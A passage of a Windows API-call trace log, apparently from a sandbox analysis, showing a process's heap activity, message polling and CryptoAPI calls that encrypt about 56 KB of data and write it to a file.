(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9748, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.822] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.822] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5a8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5a8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.822] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.823] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.824] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7bf3c8 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.824] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.824] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.825] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.825] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.825] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.825] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.825] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.826] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 1 [0075.826] TranslateMessage (lpMsg=0x61e8f4) returned 0 [0075.826] DispatchMessageW (lpMsg=0x61e8f4) returned 0x0 [0075.826] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61df90) returned 1 [0075.827] KillTimer (hWnd=0x4011e, uIDEvent=0x1) returned 1 [0075.827] SetTimer (hWnd=0x4011e, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0075.827] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.827] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.827] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.827] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.827] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.827] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.827] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.827] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.827] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.827] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.827] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.828] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.828] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.828] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0075.828] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.829] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0xdbe2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0xdbf0) returned 1 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0075.829] CharLowerBuffW (in: lpsz="byte[56305]", cchLength=0xb | out: lpsz="byte[56305]") returned 0xb [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.829] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.831] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.831] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.831] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.831] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.832] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7bf3c8*, pdwDataLen=0x61e2d8*=0xdbe2, dwBufLen=0xdbf0 | out: pbData=0x7bf3c8*, pdwDataLen=0x61e2d8*=0xdbf0) returned 1 [0075.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.832] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.832] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.839] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.839] WriteFile (in: hFile=0x128, lpBuffer=0x7a3bf0*, nNumberOfBytesToWrite=0xdbf0, lpNumberOfBytesWritten=0x61ecdc, lpOverlapped=0x0 | out: lpBuffer=0x7a3bf0*, lpNumberOfBytesWritten=0x61ecdc*=0xdbf0, lpOverlapped=0x0) returned 1 [0075.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7a3bf0 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bb8 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab68 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e5d0 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abc8 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e540 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e240 [0075.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.843] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb408 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a970 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e438 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.845] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.845] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 